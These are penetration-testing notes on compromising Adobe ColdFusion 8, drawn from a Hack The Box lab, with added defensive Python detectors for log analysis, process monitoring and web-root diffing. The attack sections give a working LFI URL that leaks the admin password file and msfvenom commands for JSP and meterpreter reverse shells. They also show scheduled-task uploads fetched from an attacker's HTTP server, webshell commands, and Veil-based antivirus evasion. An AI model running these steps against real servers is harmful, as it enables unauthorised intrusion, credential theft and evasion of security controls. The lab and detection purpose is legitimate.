Coldfusion


Last updated 2 years ago

Basics

  • REF: Arctic-HTB

Local File Inclusion - Password Leak!

  • Coldfusion 8 CVE

  • Get the Password hash using LFI

http://$IP:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
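
Added example (not part of the original notes, and not the Arctic writeup's own code): a small access-log check that flags the traversal and null-byte pattern shown in the URL above, so a defender can spot the enter.cfm locale abuse in Apache/IIS-style combined logs. The log lines in SAMPLE_LOG are constructed for this example; the `%2500` line shows the double-encoded variant the decoder also catches.

```python
# Added example (not part of the original notes): flag traversal / null-byte
# abuse of the enter.cfm "locale" parameter in web server access logs.
# Assumption: combined log format lines; SAMPLE_LOG is constructed sample data.
import re
from urllib.parse import urlsplit, parse_qs, unquote

SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5123
10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 884
10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%2F..%2F..%2FColdFusion8%2Flib%2Fpassword.properties%2500en HTTP/1.1" 200 884
10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "GET /index.cfm HTTP/1.1" 200 2048
"""

# client ip, timestamp, method, request target and status from a combined-log line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so a double-encoded %2500 still yields a NUL byte."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_reasons(value):
    """Reasons a decoded parameter value looks like the LFI pattern; [] if clean."""
    reasons = []
    if '../' in value or '..\\' in value:
        reasons.append('dot_dot_traversal')
    if '\x00' in value:
        reasons.append('null_byte')
    if 'password.properties' in value.lower():
        reasons.append('cf_password_file')
    return reasons


def parse_line(line):
    """Split one log line into fields plus the parsed query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    rec['params'] = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    return rec


def find_lfi_attempts(log_text):
    """Return one hit per suspicious query parameter value found in the log text."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, values in rec['params'].items():
            for raw in values:
                reasons = traversal_reasons(fully_decode(raw))
                if reasons:
                    hits.append({'ip': rec['ip'], 'ts': rec['ts'], 'path': rec['path'],
                                 'param': name, 'status': rec['status'],
                                 'reasons': reasons})
    return hits


if __name__ == '__main__':
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit['ip'], hit['path'], hit['param'], ','.join(hit['reasons']))
```

The check looks at every query parameter rather than only `locale`, since the same traversal shows up under other parameter names; for IIS W3C logs only LOG_RE needs adjusting. The NUL check matters because the `%00` is what truncates the `en` suffix the application appends.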

Reverse Shell

  • If you get admin access to the ColdFusion administrator

  • You can upload a Java (JSP) reverse shell through a scheduled task

Create:
msfvenom --list payloads | grep java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f raw > shell.jsp

Share:
python -m SimpleHTTPServer
python3 -m http.server

Upload:
Coldfusion > Debugging > Scheduled Tasks
URL : http://$MyIP:8000/shell.jsp
Publish: Save output to file - Yes!
File: \ColdFusion8\wwwroot\CFIDE\shell.jsp
Submit & Run

Execute:
http://$IP:8500/CFIDE/shell.jsp 

Catch:
nc -nvlp 4444
whoami tolis!

Webshell

  • If you get admin access to the ColdFusion administrator

  • You could upload the "cfexec.cfm" web shell

  • Kali ships it at /usr/share/webshells/cfm/cfexec.cfm

vim cfexec.cfm
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://$MyIP:8000/cfexec.cfm
Publish: Save output to file - Yes!
\ColdFusion8\wwwroot\CFIDE\cfexec.cfm
Submit & Run

Execute:
http://$IP:8500/CFIDE/cfexec.cfm

Command: C:\windows\system32\cmd.exe
Options: /c whoami > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c DIR C:\Users > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c systeminfo > C:\ColdFusion8\wwwroot\CFIDE\output.txt

Browse : http://$IP:8500/CFIDE/output.txt
.. arctic\tolis
.. C:\Users\tolis
.. Flag!!
.. Windows Server 2008 R2 64-Bit
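
Added example (not part of the original notes): the cfexec.cfm steps above all reduce to the ColdFusion server process spawning cmd.exe with output redirected into wwwroot\CFIDE, which is a clean process-creation detection. The code below scores Sysmon Event ID 1 style records (Image, ParentImage, CommandLine field names); the events in SAMPLE_EVENTS are constructed, and the assumption that ColdFusion 8 runs as jrun.exe is marked in the code.

```python
# Added example (not part of the original notes): flag shells spawned by the
# ColdFusion server process and command output redirected into the web root.
# Assumption: events are dicts using Sysmon Event ID 1 field names; the
# SAMPLE_EVENTS records are constructed for this example.
import ntpath

# Assumption: ColdFusion 8 runs inside JRun, so the service process is jrun.exe.
CF_SERVER_IMAGES = {'jrun.exe', 'coldfusion.exe'}
SHELLS = {'cmd.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe'}

SAMPLE_EVENTS = [
    {'EventID': 1, 'Image': r'C:\ColdFusion8\runtime\bin\jrun.exe',
     'ParentImage': r'C:\Windows\System32\services.exe',
     'CommandLine': 'jrun.exe -start coldfusion'},
    {'EventID': 1, 'Image': r'C:\Windows\System32\cmd.exe',
     'ParentImage': r'C:\ColdFusion8\runtime\bin\jrun.exe',
     'CommandLine': r'C:\windows\system32\cmd.exe /c whoami > C:\ColdFusion8\wwwroot\CFIDE\output.txt'},
    {'EventID': 1, 'Image': r'C:\Windows\System32\cmd.exe',
     'ParentImage': r'C:\Windows\explorer.exe',
     'CommandLine': 'cmd.exe'},
    {'EventID': 1, 'Image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'ParentImage': r'C:\ColdFusion8\runtime\bin\jrun.exe',
     'CommandLine': 'powershell.exe -NoProfile -Command Get-Process'},
]


def basename(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Reasons this process-creation event deserves an alert; [] if none."""
    if event.get('EventID') != 1:
        return []
    reasons = []
    child = basename(event['Image'])
    parent = basename(event['ParentImage'])
    if parent in CF_SERVER_IMAGES and child in SHELLS:
        reasons.append('shell_spawned_by_coldfusion')
    cmd = event.get('CommandLine', '').lower()
    # Output redirected into the served CFIDE directory: readable via the web server.
    if '\\cfide\\' in cmd and '>' in cmd:
        reasons.append('output_redirected_into_webroot')
    return reasons


def scan(events):
    """Return the alert-worthy events with their reasons, preserving input order."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append({'image': event['Image'], 'parent': event['ParentImage'],
                         'command': event['CommandLine'], 'reasons': reasons})
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_EVENTS):
        print(basename(hit['parent']), '->', basename(hit['image']), ','.join(hit['reasons']))
```

The parent/child rule fires on both the cmd.exe and the PowerShell record, while the interactive cmd.exe under explorer.exe stays quiet; the redirect rule is deliberately not tied to the parent so that output written into CFIDE by any chain of processes is still flagged.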

Reverse Executable

  • You may be able to upload a reverse executable

----------------------------------
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MyIP LPORT=4444 -f exe > arctic.exe
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.exe
\ColdFusion8\wwwroot\CFIDE\arctic.exe

msf > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 10.10.13.10
set LPORT 4444
run

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE > C:\ColdFusion8\wwwroot\CFIDE\output.txt
http://10.10.10.11:8500/CFIDE/output.txt
.. Found: 'arctic.exe'
.. BLOCKED by Antivirus

----------------------------------
Bypass Antivirus with veil-evasion

>  veil-evasion
>> list
>> choose '24'.. Powershell/meterpreter/rev_tcp
>> LHOST=$MyIP
>> LPORT=4444
>> generate
.. 'arctic'.. which makes 'arctic.bat'
cp arctic.bat .

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.bat
C:\ColdFusion8\wwwroot\CFIDE\arctic.bat

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE\arctic.bat
May need to try this 2-3 Times.. but will work!!

MSF - Connected!
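
Added example (not part of the original notes): the Reverse Shell, Webshell and Reverse Executable sections all end with a new file in \ColdFusion8\wwwroot\CFIDE (shell.jsp, cfexec.cfm, arctic.exe, arctic.bat, output.txt), so a baseline-and-diff of that directory catches every variant regardless of whether antivirus recognises the payload. The code below hashes a web root, diffs two snapshots and triages added or modified files by extension; the demo tree is constructed in a temporary directory and the file contents are placeholders, not real shells.

```python
# Added example (not part of the original notes): baseline-and-diff check for
# the ColdFusion CFIDE web root. Assumption: the caller supplies the real web
# root path; demo() builds a constructed sample tree in a temp directory.
import hashlib
import pathlib
import tempfile

# Extensions the server would execute or that signal a dropped payload.
SUSPICIOUS_EXT = {'.jsp', '.cfm', '.cfc', '.exe', '.bat', '.dll', '.ps1', '.vbs', '.war'}


def snapshot(root):
    """Map relative POSIX-style path -> sha256 hex digest for every file under root."""
    root = pathlib.Path(root)
    snap = {}
    for p in root.rglob('*'):
        if p.is_file():
            rel = str(p.relative_to(root)).replace('\\', '/')
            snap[rel] = hashlib.sha256(p.read_bytes()).hexdigest()
    return snap


def diff_snapshots(baseline, current):
    """Added, removed and modified paths between two snapshots, each sorted."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {'added': added, 'removed': removed, 'modified': modified}


def triage(diff):
    """Added or modified files whose extension means the server would run them."""
    flagged = [p for p in diff['added'] + diff['modified']
               if pathlib.PurePosixPath(p).suffix.lower() in SUSPICIOUS_EXT]
    return sorted(flagged)


def demo():
    """Constructed walk-through: baseline a fake CFIDE tree, drop the files the
    scheduled-task upload leaves behind, and diff. Returns (diff, flagged)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = pathlib.Path(tmp) / 'CFIDE'
        (root / 'administrator').mkdir(parents=True)
        (root / 'scripts').mkdir()
        # Stand-ins for legitimate ColdFusion files (contents are placeholders).
        (root / 'administrator' / 'enter.cfm').write_text('<cfset x = 1>')
        (root / 'scripts' / 'cfform.js').write_text('// constructed stand-in')
        baseline = snapshot(root)
        # What the uploads on this page leave behind (placeholder contents only).
        (root / 'shell.jsp').write_text('constructed placeholder, not a real shell')
        (root / 'cfexec.cfm').write_text('constructed placeholder, not a real shell')
        (root / 'output.txt').write_text('constructed command output')
        current = snapshot(root)
    diff = diff_snapshots(baseline, current)
    return diff, triage(diff)


if __name__ == '__main__':
    diff, flagged = demo()
    print('added:', diff['added'])
    print('flagged:', flagged)
```

In practice the baseline is taken after a clean install or patch and stored off the host; output.txt shows up in `added` but not in `flagged`, which is why the full diff is worth reviewing as well as the triaged list. A modified administrator/*.cfm is flagged too, since an edit to an existing page is as telling as a new one.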

Other:

  • Also consider:

--bad link

Avoid AV detection with

https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html
https://pentest.tonyng.net/attacking-adobe-coldfusion/
https://www.exploit-db.com/exploits/14641/
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/cfm/cfExec.cfm
Veil
https://arrexel.com/coldfusion-8-0-1-arbitrary-file-upload/